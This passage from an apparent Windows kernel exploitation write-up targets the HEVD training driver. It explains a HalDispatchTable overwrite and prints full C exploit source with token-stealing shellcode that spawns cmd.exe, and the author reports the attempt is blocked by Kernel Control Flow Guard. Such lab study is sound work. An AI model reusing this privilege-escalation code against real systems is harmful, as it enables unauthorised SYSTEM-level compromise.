    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    printf("[+] Fallback HalDispatchTable: 0x%llx\n", halDispatchTable);

    return halDispatchTable;
}

Reading Kernel Memory One Byte at a Time

Before resolving HalDispatchTable, I needed a way to read different data sizes from kernel memory. My arbitrary read helper gave me 8 bytes at a time through ReadQWORD(), but PE headers are not made only of 8-byte values. Some fields are 1 byte, some are 2 bytes, and many are 4-byte RVAs. So the first step was to build smaller read helpers on top of the 8-byte read primitive.

  
BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

ReadBYTE() reads a single byte from an arbitrary kernel address.

The reason this function exists is because my primitive reads 8 bytes at once. If I want one byte from address X, I first align the address down to an 8-byte boundary:

  
QWORD alignedAddress = kernelAddress & ~0x7ULL;

For example:

kernelAddress  = fffff802`1020003c
alignedAddress = fffff802`10200038

The mask ~0x7 clears the lower 3 bits of the address. Since 8 bytes equals 2^3, clearing the lower 3 bits rounds the address down to the nearest 8-byte boundary.

Then the function reads the full aligned QWORD:

  
QWORD value = ReadQWORD(hDevice, alignedAddress);

Now we have 8 bytes, but we only want one of them. This line calculates which byte inside the QWORD we need:

  
DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

kernelAddress & 0x7 gives the offset inside the 8-byte chunk. Multiplying by 8 converts the byte offset into a bit shift.

Finally, the function shifts the wanted byte into the lowest position and masks everything else away:

  
return (BYTE)((value >> shift) & 0xff);

So ReadBYTE() is just a byte extractor built on top of an 8-byte arbitrary read.

  
WORD ReadWORD(HANDLE hDevice, QWORD kernelAddress)
{
    WORD value = 0;

    value |= (WORD)ReadBYTE(hDevice, kernelAddress);
    value |= (WORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;

    return value;
}

ReadWORD() reads 2 bytes from kernel memory.

It calls ReadBYTE() twice:

  
ReadBYTE(hDevice, kernelAddress)
ReadBYTE(hDevice, kernelAddress + 1)

Then it rebuilds the 16-bit value manually.

Windows on x64 is little-endian, which means the least significant byte appears first in memory. So if memory contains:

4D 5A

the actual WORD value is:

0x5A4D

That matters because the DOS header signature for a PE file is MZ, which appears as:

'M' = 0x4D
'Z' = 0x5A

but when interpreted as a little-endian WORD, it becomes:

0x5A4D

That is why later the code checks:

  
if (mz != 0x5A4D)

  
DWORD ReadDWORD(HANDLE hDevice, QWORD kernelAddress)
{
    DWORD value = 0;

    value |= (DWORD)ReadBYTE(hDevice, kernelAddress);
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 2) << 16;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 3) << 24;

    return value;
}

ReadDWORD() reads 4 bytes from kernel memory.

This is needed because PE headers use many 32-bit fields. For example:

e_lfanew
RVA values
NumberOfNames
AddressOfFunctions
AddressOfNames
AddressOfNameOrdinals

All of those are DWORD-sized fields.

Just like ReadWORD(), this function reads bytes one by one and rebuilds the value in little-endian order.

For example, if memory contains:

60 0A C0 00

ReadDWORD() reconstructs it as:

0x00C00A60

That is exactly the kind of value we expect for an RVA like HalDispatchTable.

  
BOOL ReadKernelString(HANDLE hDevice, QWORD kernelAddress, char* buffer, DWORD maxLen)
{
    if (!buffer || maxLen == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < maxLen - 1; i++)
    {
        buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

        if (buffer[i] == '\0')
        {
            return TRUE;
        }
    }

    buffer[maxLen - 1] = '\0';
    return TRUE;
}

ReadKernelString() reads a NULL-terminated ASCII string from kernel memory.

This is needed because the PE export table does not store export names directly inside the main structure. Instead, it stores RVAs that point to strings such as:

HalDispatchTable
KeBugCheck
PsInitialSystemProcess

The function starts reading one byte at a time from the supplied kernel address:

  
buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

It stops when it sees a NULL byte:

  
if (buffer[i] == '\0')

This means the string is complete.

The function also enforces a maximum length:

  
for (DWORD i = 0; i < maxLen - 1; i++)

This prevents the function from reading forever if the target address does not contain a valid NULL-terminated string.

Finally, it manually NULL-terminates the buffer:

  
buffer[maxLen - 1] = '\0';

This is a safety measure so the buffer is still a valid C string even if the loop reaches the maximum length.

Resolving an Export from the Live Kernel Image

The main resolver is ResolveKernelExport().

  
QWORD ResolveKernelExport(HANDLE hDevice, QWORD imageBase, const char* targetExport)

This function manually parses the PE export table of a loaded kernel image and searches for a specific exported symbol.

In this exploit, the target is:

"HalDispatchTable"

The important part is that imageBase is not a user-mode copy of ntoskrnl.exe. It is the real loaded kernel base returned by EnumDeviceDrivers().

So instead of doing this:

Load ntoskrnl.exe from disk
GetProcAddress("HalDispatchTable")
Calculate offset
Add offset to kernel base

this function does this:

Read live ntoskrnl.exe from kernel memory
Parse its PE headers manually
Walk its export table
Find "HalDispatchTable"
Return the live kernel address

In simple terms, it is a homemade GetProcAddress() that works against kernel memory.

Checking the DOS Header:

  
WORD mz = ReadWORD(hDevice, imageBase);

if (mz != 0x5A4D) // MZ
{
    printf("[-] Invalid DOS header. Expected MZ, got 0x%04x\n", mz);
    return 0;
}

Every PE file starts with a DOS header. The first two bytes are:

MZ

In memory, that is:

4D 5A

As a little-endian WORD, this becomes:

0x5A4D

So this check confirms that the kernel base we found actually points to a PE image.

If this fails, then either the base address is wrong or the read primitive is not working correctly.

Finding the NT Headers:

  
DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
QWORD ntHeaders = imageBase + e_lfanew;

Inside the DOS header, offset 0x3c contains a field called e_lfanew.

e_lfanew is the offset from the image base to the real PE headers.

So the code reads:

  
imageBase + 0x3c

and then calculates:

  
ntHeaders = imageBase + e_lfanew;

This gives us the address of the NT headers in the live kernel image.

Checking the PE Signature:

  
DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

if (peSignature != 0x00004550) // PE\0\0
{
    printf("[-] Invalid PE signature. Got 0x%08lx\n", peSignature);
    return 0;
}

The NT headers start with the PE signature:

PE\0\0

In hex, that is:

50 45 00 00

As a little-endian DWORD, it becomes:

0x00004550

This confirms that the address calculated from e_lfanew really points to the NT headers.

Locating the Optional Header:

  
QWORD optionalHeader = ntHeaders + 0x18;

The PE NT headers are laid out like this:

IMAGE_NT_HEADERS64
+0x00  Signature        4 bytes
+0x04  FileHeader       20 bytes / 0x14
+0x18  OptionalHeader

So ntHeaders + 0x18 lands at the Optional Header.

Despite the name, the Optional Header is not really optional for normal PE files. It contains important information such as image layout, entry point, image base, and data directories.

Verifying PE32+:

  
WORD magic = ReadWORD(hDevice, optionalHeader);

if (magic != 0x20b) // PE32+
{
    printf("[-] Not a PE32+ image. OptionalHeader.Magic = 0x%04x\n", magic);
    return 0;
}

The first field in the Optional Header is Magic.

For 64-bit PE images, this value is:

0x20b

This is called PE32+.

Since this exploit is running against Windows 10 x64, ntoskrnl.exe should be a PE32+ image. If this check fails, then either the parser is pointed at the wrong memory or the target is not a 64-bit PE image.

Reading the Export Directory RVA:

  
DWORD exportDirectoryRva = ReadDWORD(hDevice, optionalHeader + 0x70);

if (!exportDirectoryRva)
{
    printf("[-] Export directory RVA is NULL\n");
    return 0;
}

The Optional Header contains an array called the Data Directory. The first entry in that array points to the Export Directory.

For PE32+ images, the Export Directory RVA is located at:

OptionalHeader + 0x70

This value is an RVA, not a full virtual address.

An RVA is a Relative Virtual Address. It is relative to the image base.

So if the export directory RVA is:

0x1334000

and the kernel image base is:

fffff802`10200000

then the real address is:

fffff802`10200000 + 0x1334000

Converting Export Directory RVA to VA:

  
QWORD exportDirectory = imageBase + exportDirectoryRva;

This converts the RVA into a real kernel virtual address.

At this point, exportDirectory points to an IMAGE_EXPORT_DIRECTORY structure inside the live kernel image.

Reading Export Directory Fields:

  
DWORD numberOfNames = ReadDWORD(hDevice, exportDirectory + 0x18);
DWORD addressOfFunctionsRva = ReadDWORD(hDevice, exportDirectory + 0x1c);
DWORD addressOfNamesRva = ReadDWORD(hDevice, exportDirectory + 0x20);
DWORD addressOfNameOrdinalsRva = ReadDWORD(hDevice, exportDirectory + 0x24);

These fields come from the IMAGE_EXPORT_DIRECTORY structure.

The important ones are:

NumberOfNames
AddressOfFunctions
AddressOfNames
AddressOfNameOrdinals

NumberOfNames tells us how many named exports exist.

AddressOfNames is an RVA to an array of RVAs. Each entry points to an export name string.

AddressOfNameOrdinals is an RVA to an array of ordinals. Each ordinal maps a name to a function-table index.

AddressOfFunctions is an RVA to an array of function RVAs.

Together, these three arrays let us go from:

export name -> ordinal -> function RVA -> function address

That is exactly what GetProcAddress() normally does for us.

Converting Export Arrays to Kernel Addresses:

  
QWORD addressOfFunctions = imageBase + addressOfFunctionsRva;
QWORD addressOfNames = imageBase + addressOfNamesRva;
QWORD addressOfNameOrdinals = imageBase + addressOfNameOrdinalsRva;

Again, these fields are RVAs, so they need to be converted to real addresses by adding the image base.

After this, the resolver has three live kernel addresses:

addressOfNames         -> array of export-name RVAs
addressOfNameOrdinals  -> array of WORD ordinals
addressOfFunctions     -> array of function RVAs

Walking the Export Names:

  
for (DWORD i = 0; i < numberOfNames; i++)
{
    DWORD nameRva = ReadDWORD(
        hDevice,
        addressOfNames + (i * sizeof(DWORD))
    );

    QWORD nameAddress = imageBase + nameRva;

    char exportName[256] = { 0 };

    ReadKernelString(
        hDevice,
        nameAddress,
        exportName,
        sizeof(exportName)
    );

This loop walks every named export.

Each entry in AddressOfNames is a DWORD-sized RVA. So for each index i, the code reads:

  
addressOfNames + (i * sizeof(DWORD))

That gives the RVA of the export name string.

Then it converts that RVA into a real address:

  
QWORD nameAddress = imageBase + nameRva;

Then it reads the string from kernel memory:

  
ReadKernelString(hDevice, nameAddress, exportName, sizeof(exportName));

At this point, exportName might contain something like:

HalDispatchTable
KeBugCheck
PsInitialSystemProcess

Comparing the Export Name:

  
if (strcmp(exportName, targetExport) == 0)

This checks whether the current export name matches the symbol we want.

In this exploit, the call is:

  
ResolveKernelExport(hDevice, ntBase, "HalDispatchTable")

So the loop keeps going until it finds:

HalDispatchTable

Resolving Name to Ordinal:

  
WORD ordinal = ReadWORD(
    hDevice,
    addressOfNameOrdinals + (i * sizeof(WORD))
);

The export name array does not directly index the function address array.

Instead, the export name index maps to an ordinal entry.

So once we find the right name at index i, we read the matching ordinal from:

AddressOfNameOrdinals[i]

This ordinal is then used as an index into the function RVA array.

Resolving Ordinal to Function RVA:

  
DWORD functionRva = ReadDWORD(
    hDevice,
    addressOfFunctions + (ordinal * sizeof(DWORD))
);

Now the code uses the ordinal as an index into AddressOfFunctions.

This gives the RVA of the actual exported symbol.

For HalDispatchTable, your output showed:

Export RVA: 0xc00a60

That means HalDispatchTable lives at:

ntBase + 0xc00a60

Converting Function RVA to Kernel Address:

  
QWORD functionAddress = imageBase + functionRva;

This converts the function/symbol RVA into a real live kernel address.

Resolving HalDispatchTable with a Fallback:

  
QWORD ResolveHalDispatchTable(HANDLE hDevice, QWORD ntBase)
{
    QWORD halDispatchTable = 0;

    printf("[+] Trying dynamic HalDispatchTable export resolution...\n");

    halDispatchTable = ResolveKernelExport(
        hDevice,
        ntBase,
        "HalDispatchTable"
    );

    if (halDispatchTable)
    {
        printf("[+] Dynamic HalDispatchTable resolution succeeded\n");
        return halDispatchTable;
    }

    printf("[!] Dynamic HalDispatchTable resolution failed\n");
    printf("[!] Falling back to hardcoded WinDBG offset: 0x%llx\n",
        HALDISPATCHTABLE_FALLBACK_OFFSET
    );

    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    printf("[+] Fallback HalDispatchTable: 0x%llx\n", halDispatchTable);

    return halDispatchTable;
}

ResolveHalDispatchTable() is a small wrapper around the generic export resolver.

The generic function can resolve any exported kernel symbol:

  
ResolveKernelExport(hDevice, ntBase, "SomeExportedSymbol")

But in this exploit, we specifically care about:

HalDispatchTable

So this wrapper calls:

  
ResolveKernelExport(
    hDevice,
    ntBase,
    "HalDispatchTable"
);

If the dynamic resolution succeeds, the function returns the live kernel address of HalDispatchTable.

That is the ideal path:

Live ntoskrnl base
    |
    v
Parse live PE export table
    |
    v
Find "HalDispatchTable"
    |
    v
Return live nt!HalDispatchTable

If the export parsing fails, the code falls back to the WinDBG-derived offset:

  
halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

In the machine, WinDBG gave:

? nt!HalDispatchTable - nt = 0xC00A60

So the fallback is:

#define HALDISPATCHTABLE_FALLBACK_OFFSET 0xC00A60ULL

This gives both flexibility and reliability.

The dynamic method is nicer because it does not require hardcoding the offset. It reads the actual loaded kernel image and resolves the symbol from its export directory.

The fallback is useful because not every symbol is guaranteed to be exported on every build, and exploit development is already enough pain without letting one missing export ruin the entire afternoon.

After this function returns, the exploit calculates the actual target entry:

  
halDispatchEntry = halDispatchTable + 0x8;

On x64, function pointers are 8 bytes. That is why this exploit uses:

HalDispatchTable + 0x8

instead of the older x86-style:

HalDispatchTable + 0x4

So the final target becomes:

nt!HalDispatchTable + 0x8

In the run output in WinDBG, this became:

HalDispatchTable:       fffff802`10e00a60
HalDispatchTable + 0x8: fffff802`10e00a68

That is the address the arbitrary write overwrites with the shellcode pointer. Remember, this headache and pain I asked for. This could easily be done using GetProcAddress and LoadLibrary APIs. At this point, I basically wrote a very tiny, very cursed GetProcAddress() that works against the live kernel image instead of a user mode mapped copy. Microsoft gave us PE headers, and I gave myself another reason to hate offsets.

Ringing the `NtQueryIntervalProfile` Doorbell

After overwriting HalDispatchTable + 0x8, the next problem is simple: we need to make Windows actually use that function pointer.

We do not call HalDispatchTable directly from user mode. It lives in kernel memory, and user mode cannot just call into it like a normal function. Instead, we trigger a legitimate Windows syscall path that eventually reaches it.

That syscall is:

NtQueryIntervalProfile

The setup starts with this typedef:

  
typedef LONG NTSTATUS;

typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(
    ULONG ProfileSource,
    PULONG Interval
);

NtQueryIntervalProfile returns an NTSTATUS, so we define NTSTATUS as a LONG. Then we define a function-pointer type named NtQueryIntervalProfile_t.

The function takes two arguments:

  
ULONG ProfileSource
PULONG Interval

ProfileSource tells Windows what kind of profiling interval information we are asking for. Interval is an output pointer where Windows can place the result.

For this exploit, we do not really care about the returned interval value. We only care that calling this API makes the kernel walk into the code path that uses HalDispatchTable.

The code resolves the function dynamically from ntdll.dll:

  
HMODULE ntdll = GetModuleHandleA("ntdll.dll");

ntdll.dll is already loaded into normal Windows processes. It contains the user mode syscall stubs for Native APIs like NtQueryIntervalProfile.

Then the code gets the address of the exported function:

  
NtQueryIntervalProfile_t NtQueryIntervalProfile =
    (NtQueryIntervalProfile_t)GetProcAddress(
        ntdll,
        "NtQueryIntervalProfile"
    );

This gives the exploit a callable user mode function pointer.

At this point, the important setup has already happened:

HalDispatchTable + 0x8 -> shellcodeAddress

So when the exploit calls:

  
ULONG interval = 0;

NTSTATUS status = NtQueryIntervalProfile(
    ProfileTotalIssues,
    &interval
);

the flow becomes:

User mode
    |
    | NtQueryIntervalProfile(ProfileTotalIssues, &interval)
    v
ntdll syscall stub
    |
    v
Kernel mode
    |
    v
nt!NtQueryIntervalProfile
    |
    v
nt!KeQueryIntervalProfile
    |
    v
Indirect call through HalDispatchTable + 0x8

In the classic technique, that final indirect call is the whole point.

Normally, HalDispatchTable + 0x8 points to a legitimate HAL routine. But after our arbitrary write, it points to our payload instead. So when the kernel reaches that call, execution is redirected to the address we placed inside the table.

So the exploit sequence is:

Allocate shellcode
Resolve HalDispatchTable
Save the original HalDispatchTable + 0x8 value
Overwrite HalDispatchTable + 0x8 with shellcodeAddress
Call NtQueryIntervalProfile
Kernel reaches the overwritten HAL entry
Payload executes
Restore the original HAL entry

Finale

The final code becomes this

  
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <string.h>

#pragma comment(lib, "Psapi.lib")

#define QWORD ULONGLONG

#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

#define HALDISPATCHTABLE_FALLBACK_OFFSET 0xC00A60ULL
#define HAL_ENTRY_OFFSET 0x8ULL
#define ProfileTotalIssues 2

typedef LONG NTSTATUS;

typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(
    ULONG ProfileSource,
    PULONG Interval
    );

typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return ok;
}

BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

WORD ReadWORD(HANDLE hDevice, QWORD kernelAddress)
{
    WORD value = 0;

    value |= (WORD)ReadBYTE(hDevice, kernelAddress);
    value |= (WORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;

    return value;
}

DWORD ReadDWORD(HANDLE hDevice, QWORD kernelAddress)
{
    DWORD value = 0;

    value |= (DWORD)ReadBYTE(hDevice, kernelAddress);
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 2) << 16;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 3) << 24;

    return value;
}

BOOL ReadKernelString(HANDLE hDevice, QWORD kernelAddress, char* buffer, DWORD maxLen)
{
    if (!buffer || maxLen == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < maxLen - 1; i++)
    {
        buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

        if (buffer[i] == '\0')
        {
            return TRUE;
        }
    }

    buffer[maxLen - 1] = '\0';
    return TRUE;
}

QWORD ResolveKernelExport(HANDLE hDevice, QWORD imageBase, const char* targetExport)
{
    WORD mz = ReadWORD(hDevice, imageBase);

    if (mz != 0x5A4D) // MZ
    {
        printf("[-] Invalid DOS header. Expected MZ, got 0x%04x\n", mz);
        return 0;
    }

    DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
    QWORD ntHeaders = imageBase + e_lfanew;

    DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

    if (peSignature != 0x00004550) // PE\0\0
    {
        printf("[-] Invalid PE signature. Got 0x%08lx\n", peSignature);
        return 0;
    }

    QWORD optionalHeader = ntHeaders + 0x18;

    WORD magic = ReadWORD(hDevice, optionalHeader);

    if (magic != 0x20b) // PE32+
    {
        printf("[-] Not a PE32+ image. OptionalHeader.Magic = 0x%04x\n", magic);
        return 0;
    }

    DWORD exportDirectoryRva = ReadDWORD(hDevice, optionalHeader + 0x70);

    if (!exportDirectoryRva)
    {
        printf("[-] Export directory RVA is NULL\n");
        return 0;
    }

    QWORD exportDirectory = imageBase + exportDirectoryRva;

    DWORD numberOfNames = ReadDWORD(hDevice, exportDirectory + 0x18);
    DWORD addressOfFunctionsRva = ReadDWORD(hDevice, exportDirectory + 0x1c);
    DWORD addressOfNamesRva = ReadDWORD(hDevice, exportDirectory + 0x20);
    DWORD addressOfNameOrdinalsRva = ReadDWORD(hDevice, exportDirectory + 0x24);

    QWORD addressOfFunctions = imageBase + addressOfFunctionsRva;
    QWORD addressOfNames = imageBase + addressOfNamesRva;
    QWORD addressOfNameOrdinals = imageBase + addressOfNameOrdinalsRva;

    printf("[+] Export directory:        0x%llx\n", exportDirectory);
    printf("[+] NumberOfNames:           %lu\n", numberOfNames);

    for (DWORD i = 0; i < numberOfNames; i++)
    {
        DWORD nameRva = ReadDWORD(
            hDevice,
            addressOfNames + (i * sizeof(DWORD))
        );

        QWORD nameAddress = imageBase + nameRva;

        char exportName[256] = { 0 };

        ReadKernelString(
            hDevice,
            nameAddress,
            exportName,
            sizeof(exportName)
        );

        if (strcmp(exportName, targetExport) == 0)
        {
            WORD ordinal = ReadWORD(
                hDevice,
                addressOfNameOrdinals + (i * sizeof(WORD))
            );

            DWORD functionRva = ReadDWORD(
                hDevice,
                addressOfFunctions + (ordinal * sizeof(DWORD))
            );

            QWORD functionAddress = imageBase + functionRva;

            printf("[+] Found export:            %s\n", exportName);
            printf("[+] Export ordinal:          %u\n", ordinal);
            printf("[+] Export RVA:              0x%lx\n", functionRva);
            printf("[+] Export address:          0x%llx\n", functionAddress);

            return functionAddress;
        }
    }

    printf("[-] Export not found: %s\n", targetExport);
    return 0;
}

QWORD ResolveHalDispatchTable(HANDLE hDevice, QWORD ntBase)
{
    QWORD halDispatchTable = 0;

    printf("[+] Trying dynamic HalDispatchTable export resolution...\n");

    halDispatchTable = ResolveKernelExport(
        hDevice,
        ntBase,
        "HalDispatchTable"
    );

    if (halDispatchTable)
    {
        printf("[+] Dynamic HalDispatchTable resolution succeeded\n");
        return halDispatchTable;
    }

    printf("[!] Dynamic HalDispatchTable resolution failed\n");
    printf("[!] Falling back to hardcoded WinDBG offset: 0x%llx\n",
        HALDISPATCHTABLE_FALLBACK_OFFSET
    );

    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    printf("[+] Fallback HalDispatchTable: 0x%llx\n", halDispatchTable);

    return halDispatchTable;
}

QWORD GetKernelBaseAddress(LPCWSTR driverName)
{
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[-] EnumDeviceDrivers failed. Error=%lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH] = { 0 };

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    return 0;
}

unsigned char shellcode[] = {
    0x9c, 0x53, 0x51, 0x52, 0x56, 0x57, 0x55, 0x41,
    0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41,
    0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x65,
    0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48,
    0x89, 0xc3, 0x49, 0x89, 0xc4, 0x4d, 0x8b, 0xa4,
    0x24, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xec,
    0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0xac, 0x24,
    0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xfd, 0x04,
    0x75, 0xe3, 0x4d, 0x8b, 0xac, 0x24, 0xb8, 0x04,
    0x00, 0x00, 0x49, 0x83, 0xe5, 0xf0, 0x4c, 0x8b,
    0xb3, 0xb8, 0x04, 0x00, 0x00, 0x49, 0x83, 0xe6,
    0x0f, 0x4d, 0x09, 0xf5, 0x4c, 0x89, 0xab, 0xb8,
    0x04, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
    0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41,
    0x59, 0x41, 0x58, 0x5d, 0x5f, 0x5e, 0x5a, 0x59,
    0x5b, 0x9d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc3
};

int main()
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    LPVOID shellcodeAddress = NULL;

    QWORD ntBase = 0;
    QWORD halDispatchTable = 0;
    QWORD halDispatchEntry = 0;
    QWORD originalHalEntry = 0;
    QWORD verifyHalEntry = 0;
    QWORD restoredHalEntry = 0;

    HMODULE ntdll = NULL;
    NtQueryIntervalProfile_t NtQueryIntervalProfile = NULL;

    ULONG interval = 0;
    NTSTATUS status = 0;

    BOOL halOverwritten = FALSE;

    printf("[+] Opening device: %ls\n", DEVICE_NAME);

    hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    ntBase = GetKernelBaseAddress(L"ntoskrnl.exe");

    if (!ntBase)
    {
        ntBase = GetKernelBaseAddress(L"ntkrnlmp.exe");
    }

    if (!ntBase)
    {
        printf("[-] Failed to find ntoskrnl.exe / ntkrnlmp.exe base\n");
        goto cleanup;
    }

    printf("[+] nt base:                 0x%llx\n", ntBase);

    halDispatchTable = ResolveHalDispatchTable(hDevice, ntBase);

    if (!halDispatchTable)
    {
        printf("[-] Failed to resolve HalDispatchTable\n");
        goto cleanup;
    }

    halDispatchEntry = halDispatchTable + HAL_ENTRY_OFFSET;

    printf("[+] HalDispatchTable:        0x%llx\n", halDispatchTable);
    printf("[+] HalDispatchTable + 0x8:  0x%llx\n", halDispatchEntry);

    shellcodeAddress = VirtualAlloc(
        NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!shellcodeAddress)
    {
        printf("[-] VirtualAlloc failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    memcpy(shellcodeAddress, shellcode, sizeof(shellcode));

    printf("[+] Shellcode address:       0x%p\n", shellcodeAddress);

    ntdll = GetModuleHandleA("ntdll.dll");

    if (!ntdll)
    {
        printf("[-] GetModuleHandleA(ntdll.dll) failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    NtQueryIntervalProfile =
        (NtQueryIntervalProfile_t)GetProcAddress(
            ntdll,
            "NtQueryIntervalProfile"
        );

    if (!NtQueryIntervalProfile)
    {
        printf("[-] Failed to resolve NtQueryIntervalProfile. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    originalHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    if (!originalHalEntry)
    {
        printf("[-] Failed to read original HalDispatchTable entry\n");
        goto cleanup;
    }

    printf("[+] Original HAL entry:      0x%llx\n", originalHalEntry);

    printf("[+] Overwriting HalDispatchTable + 0x8...\n");

    if (!WriteQWORD(
        hDevice,
        halDispatchEntry,
        (QWORD)(ULONG_PTR)shellcodeAddress
    ))
    {
        printf("[-] Failed to overwrite HalDispatchTable entry\n");
        goto cleanup;
    }

    halOverwritten = TRUE;

    verifyHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after write:   0x%llx\n", verifyHalEntry);

    if (verifyHalEntry != (QWORD)(ULONG_PTR)shellcodeAddress)
    {
        printf("[-] HAL entry verification failed\n");
        goto cleanup;
    }

    printf("[+] Triggering NtQueryIntervalProfile...\n");

    interval = 0;

    status = NtQueryIntervalProfile(
        ProfileTotalIssues,
        &interval
    );

    printf("[+] NtQueryIntervalProfile returned: 0x%lx\n", status);

    printf("[+] Restoring original HAL entry...\n");

    if (!WriteQWORD(hDevice, halDispatchEntry, originalHalEntry))
    {
        printf("[-] Failed to restore original HAL entry\n");
        goto cleanup;
    }

    halOverwritten = FALSE;

    restoredHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after restore: 0x%llx\n", restoredHalEntry);

    if (restoredHalEntry == originalHalEntry)
    {
        printf("[+] HAL entry restored successfully\n");
    }
    else
    {
        printf("[!] HAL entry restore verification mismatch\n");
    }

    printf("[+] Spawning cmd.exe\n");
    system("cmd.exe");

cleanup:

    if (halOverwritten && originalHalEntry)
    {
        printf("[!] Attempting emergency HAL entry restore...\n");
        WriteQWORD(hDevice, halDispatchEntry, originalHalEntry);
    }

    if (shellcodeAddress)
    {
        VirtualFree(shellcodeAddress, 0, MEM_RELEASE);
    }

    if (hDevice != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hDevice);
    }

    return 0;
}

I tried to make it look as pretty as I could using AI but it still looks like a lot.

The Crash

But guess what? The exploit didn’t work. The VM crashed. Why? Because of something called Kernel Control Flow Guard.

WinDBG shows this

0x139_0_LEGACY_GS_VIOLATION_nt!guard_icall_bugcheck

Remember, at this point we are working with a VM with no SMEP. But still KCFG blocks our execution.

Enter Kernel Control Flow Guard

At this point, the classic HalDispatchTable technique looked like it should work.

The exploit successfully resolved HalDispatchTable, calculated the target entry at HalDispatchTable + 0x8, saved the original value, overwrote the entry with the shellcode address, and triggered the path using NtQueryIntervalProfile.

